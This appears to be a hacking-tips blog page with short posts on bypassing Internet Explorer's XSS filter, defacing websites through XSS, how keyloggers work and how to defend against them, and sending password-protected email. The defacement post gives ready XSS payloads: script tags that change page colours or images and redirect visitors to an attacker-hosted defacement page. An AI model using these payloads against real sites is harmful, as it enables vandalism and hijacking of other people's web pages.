How to bypass Internet Explorer's XSS filter

Last night i was going through some security papers, then i have found a nice reaserch paper on bypassing Internet Explorer's XSS filter.  “read more” By default Internet Explorer 9 has a security system to help prevent Reflective XSS attacks.
There are well known shortfalls of this system,  most notably that it does not attempt to address DOM based XSS or Stored XSS. This security system is built on an arbitrary philosophy which only accounts for the most straight forward of reflective XSS attacks[1]. This paper is covering three attack patterns that undermine Internet Explorer's ability to prevent Reflective XSS.  These are general attack patterns that are independent of Web Application platform.


Read here 
https://sitewat.ch/files/Bypassing%20Internet%20Explorer%27s%20XSS%20Filter.pdf

Read More

How to deface website with Cross Site Scripting ?

                                                                        Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!

Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>


Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>

Defacement Page with Pastehtml:

First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites

Read More

What is Keylogger?

Just like in any other things, to be able to detect things and to know how to prevent it, you must be aware of how it works. Keylogger is a software program that tracks your online act and keyboard stroke. This software is used by thieves in accessing your accounts
 How does keylogger works?

You wont even notice that your computer slows down. Key logger works just like a thief in the night. It records your keyboard stroke and all the information you typed. Key loggers are usually used by the company to record their employees activities, or at home when parents want to monitor their kids computer activities. However, when key loggers are used by hackers, their intention is to manipulate your account and use it for their personal interest. This is extremely dangerous.

When another party accessed your account, all the information can be used without your actual consent. This can be dangerous, as that means they can transfer, purchase and transact on your behalf. Even worse, they can manipulate your whole account like websites, social accounts, etc. And for some, retrieving it can be very difficult.

What you need to know about keylogger

There are 2 types of keyloggers: The software-based keyloggers and the hardware based key. The software based keyloggers are software that are designed to work on the computer operating system while hardware-based keyloggers do not need software as they can be found at the hardware level of your computer system.

How To Protect Your Computer From Keylogger

Now that you know the risks of being a victim of keylogger, the next question is, is there a way to avoid it? The answer is yes!

You can opt for one of more of the following:Use Anti-keylogger software. This software works by detecting keyloggers on your computer.

• Using live CD/USB. You can reboot your computer with teh use of live cd or usb ( USB must be write protected). Booting using a different operating system does not affect the use of hardware or BIOS based keylogger.

• Using anti-spyware and anti-virus programs. It is important that you update them regularly.

• Using robo-forms or any automatic form filler. This will lessen the needs for you to type details and passwords using the keyboard.

• Use a firewall to help stop unauthorized computer activities.

• Avoid opening email attachments from unknown source.

• Avoid suing public computers in accessing your online accounts.

• Run weekly scan to your computers.

Remember that there is no particular software or technique that will be 100% effective against all kinds of keyloggers. You can protect yourself  by being extra careful in opening websites and downloading applications. You are more protected from being keylogger victim when you know you have to be extra careful.

Incoming search terms:

• keylogger
• virus keylogger
• keyloggers
• keylogger virus
• what is keylogger
• about keylogger
• how does keylogger works
• how keylogger works
• Keylogger png
• about keyloggers

Read More

How to send password protected Email

 

Now a days, Email is the most common media for information interchange. It is used by most of the working person. Most of the popular email servers such as GMail, Yahoo mail, Hotmail and many other provide this email service for free. Users need to create a free account and then they can use their account for sending and recieveing emails.

But Cyber criminals are always try to hack passwords of users email account to read emails and misuse the account. Do you know? you can also protect each mail sent by you with a password for better information security. If some one maneged to get into the account, he would not be able to read the email without knowing the password. To send the password protect email, you have to use a third party service named as LockBin

• go the link http://www.lockbin.com/lockbin.php
• Fill the form and send the mail. And also inform receiver that you have sent the mail and password as well
• Recipient will get the email with a link. To read the email, he will have to go the link and verifiy the password which you have entered while sending the email.
• After submitting password Receiver can view message.

Read More